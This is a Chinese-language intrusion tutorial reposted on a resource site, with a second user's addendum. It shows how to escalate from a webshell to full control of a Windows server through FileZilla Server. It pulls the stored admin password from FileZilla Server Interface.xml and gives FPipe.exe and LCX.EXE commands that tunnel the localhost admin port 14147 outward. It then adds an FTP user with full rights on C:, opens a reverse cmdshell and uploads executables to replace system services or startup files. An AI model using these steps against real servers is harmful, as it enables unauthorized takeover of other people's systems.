也想出现在这里? 联系我们

曲折的FileZilla Server提权之路

作者 : 小编 本文共4286个字,预计阅读时间需要11分钟 发布时间: 2021-06-8 共1.83K人阅读
也想出现在这里? 联系我们

首先明确一下以下三个要素:

一、FileZilla Server安装路径,为得到FileZilla Server Interface.xml文件提供条件。
二、本地FileZilla Server要与服务器版本兼容,不然会提示版本不同,协议错误。
三、FileZilla Server中FileZilla Server Interface.xml文件保存了管理口令。
明白以上三点后现在就是尝试如何连接到服务器上的FileZilla Server。
首先查看FileZilla Server Interface.xml中的内容

复制代码

代码如下:

<FileZillaServer>
<Settings>
<Item name=\”Last Server Address\” type=\”string\”>127.0.0.1</Item>
<Item name=\”Last Server Port\” type=\”numeric\”>14147</Item>
<Item name=\”Last Server Password\” type=\”string\”>qwertyu</Item>
<Item name=\”Always use last server\” type=\”numeric\”>0</Item>
<Item name=\”User Sorting\” type=\”numeric\”>0</Item>
</Settings>
</FileZillaServer>

name="Last Server Address" type="string"
127.0.0.1为服务器IP,此处默认定义为127.0.0.1绑定在本地,不是绑定在0.0.0.0所以只能本地连接上去。
name="Last Server Port" type="numeric"
14147为FileZilla Server管理连接端口,默认值14147
name="Last Server Password" type="string"
qwertyu为管理口令,此处口令为安装时自定义,要在此文件中得到口令必须在配置中勾取保存口令选项。
现在说说实际中比较BT的状况如何处理。
服务器对外只开放80,得到权限为webshell,服务器唯一安装第三方软件为FileZilla Server。数据库为Ms-SQL2005,无Systemadmin权限账户,现有数据库账户为DB权限,禁止了一切与数据库有关的备份功能。
测试网络环境,对外开放80,shell中netstat -an中看到有21,80,1433,3389三个外部端口,内部端口有14147。经测试发现,除80端口外其余全部无法连接。
如上情况下,要取得服务器权限能用到的只能是FileZilla Server。当然,从外部看,服务器确实十分健硕,但从内部看的话还是有机可乘的。首先明确下第一目的,首先要做的是得到FileZilla Server的管理权限,但是FileZilla Server的管理端口绑定在127.0.0.1:14147上,外部是无法访问到的。
要得到外部访问权限我们可以用LCX开发的LCX.EXE端口反弹转发程序实现,但是在现实测试的时候发现FileZilla Server对于网络环境要求非常之高,这也是FileZilla Server的访问协议造成的,直接用LCX.EXE转发是极不稳定的(在光纤环境下测试也连接不上)。再者网上的唯一一份FileZilla Server提权教程中提到了FPipe.exe程序。FPipe.exe程序为实现端口转发功能而开发的,其作用可将本地端口监听数据转发功能。在当前 条件下,即使将本地绑定端口转发到外部端口也是连接不上的,估计是硬防。
现在可以知道环境是极其BT的,寻找突破的道路是需要发掘的,我的方法是,用FPipe.exe将14147端口转发到外部其他端口,再用LCX.EXE 将FPipe.exe端口转发出来。FPipe.exe -v -l 1234 -r 14147 127.0.0.1。本地LCX.EXE -LISTEN 1234 14147。服务器上LCX.EXE -SLAVE 本机IP 1234 服务器IP 1234。这样就能实现本地连接了,但是还是对网络环境要求很高的。
然后本地连接上FileZilla Server管理,然后添加一个FTP用户,用户目录设置为C:勾取所有权限操作选项。FileZilla Server添加FTP用户的工作就结束了。
现在是提升权限的问题了,FileZilla Server不比serv-U,可以quote site exec执行dos命令(不知道是不行还是有其他参数可以实现,我不懂…)要实现提权的话可以FTP登录上去操作文件管理,如替换系统服务、替换系统 文件、将程序置于启动目录等等。
现在的问题是服务器开放了21端口,但是外部是不能访问的,FTP端口转发出来也不稳定,极易断开。现在办法是直接从服务器上登录服务器FTP。反弹一个cmdshell,然后写个ftp自动处理脚本
open 127.0.0.1 21
user
pass
put soft.exe 存放目录
bye
然后本地ftp.exe -s:ftp.txt就能实现本地上传本地了。就此,以FileZilla Server提升权限也实现了。

下面其他网友的补充:

FileZilla Server应该好多牛人都知道怎么提权的了吧,很简单的,我再啰嗦一次
管理员密码以及端口都是保存在FileZilla Server Interface.xml文件里的
FileZilla Server Interface.xml内容大致如下

<FileZillaServer>
<Settings>
<Item name="Last Server Port" type="numeric">14147</Item>
<Item name="Last Server Password" type="cool"/>
<Item name="Always use last server" type="numeric">1</Item>
<Item name="User Sorting" type="numeric">0</Item>
<Item name="Last Server Address" type="string">127.0.0.1</Item>
</Settings>
</FileZillaServer>

端口是14147 密码是cool 其中14147是管理端口 例如su的43859一样

FileZilla Server.xml文件是保存ftp用户密码用的 FileZilla Server.xml用户密码是32位加密的md5
FileZilla Server.xml大致内容如下:

<FileZillaServer>
<Settings>
<Item name="Admin port" type="numeric">14147</Item>
</Settings>
<Groups/>
<Users>
<User Name="abc">
<Option Name="Pass">900150983cd24fb0d6963f7d28e17f72</Option>
<Option Name="Group"/>
<Option Name="Bypass server userlimit">0</Option>
<Option Name="User Limit">0</Option>
<Option Name="IP Limit">0</Option>
<Option Name="Enabled">1</Option>
<Option Name="Comments"/>
<Option Name="ForceSsl">0</Option>
<IpFilter>
<Disallowed/>
<Allowed/>
</IpFilter>
<Permissions>
<Permission Dir="E:">
<Option Name="FileRead">1</Option>
<Option Name="FileWrite">1</Option>
<Option Name="FileDelete">1</Option>
<Option Name="FileAppend">0</Option>
<Option Name="DirCreate">1</Option>
<Option Name="DirDelete">1</Option>
<Option Name="DirList">1</Option>
<Option Name="DirSubdirs">1</Option>
<Option Name="IsHome">1</Option>
<Option Name="AutoCreate">0</Option>
</Permission>
</Permissions>
<SpeedLimits DlType="0" DlLimit="10" ServerDlLimitBypass="0" UlType="0" UlLimit="10" ServerUlLimitBypass="0">
<Download/>
<Upload/>
</SpeedLimits>
<User Name="abc">是用户名 <Option Name="Pass">900150983cd24fb0d6963f7d28e17f72</Option> 是用户密码
<Permission Dir="E:">
<Option Name="FileRead">1</Option>
<Option Name="FileWrite">1</Option>
<Option Name="FileDelete">1</Option>
<Option Name="FileAppend">0</Option>
<Option Name="DirCreate">1</Option>
<Option Name="DirDelete">1</Option>
<Option Name="DirList">1</Option>
<Option Name="DirSubdirs">1</Option>
<Option Name="IsHome">1</Option>
<Option Name="AutoCreate">0</Option>

该用户的权限
好了下面介绍下怎么利用吧,只需要把14147端口转发出去,然后利用管理密码登陆进去添加用户即可
演示一下好了
把端口转发出去

再本地打开FileZilla Server输入IP端口密码

表示成功了

剩下的自己可以添加ftp用户为所欲为了,关于怎么添加用户我不啰嗦了,很简单的,实在不会就去下载个中文版的就好了

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 曲折的FileZilla Server提权之路

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录